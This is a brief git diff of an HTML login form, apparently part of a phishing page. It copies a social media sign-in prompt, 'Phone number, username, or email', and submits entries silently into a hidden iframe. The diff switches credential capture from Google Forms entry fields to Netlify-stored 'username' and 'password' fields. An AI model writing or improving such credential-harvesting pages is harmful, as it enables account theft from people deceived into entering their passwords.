--- a/index.html
+++ b/index.html
@@ -19,11 +19,11 @@
                   
 <form name="dbnet" netlify target="hidden_iframe" onsubmit="submitted=true" method="POST">
                     <div class="input-box">
-                      <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="entry.1256530639" value="" required>
+                      <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="username" value="" required>
                     </div>  
 
                     <div class="input-box">
-                      <input type="password" name="entry.1859322566" id="password" placeholder="Password" aria-describedby="" maxlength="30" aria-required="true" autocapitalize="off" autocorrect="off" required>
+                      <input type="password" name="password" id="password" placeholder="Password" aria-describedby="" maxlength="30" aria-required="true" autocapitalize="off" autocorrect="off" required>
                     </div>  
 
                     <span class="button-box">
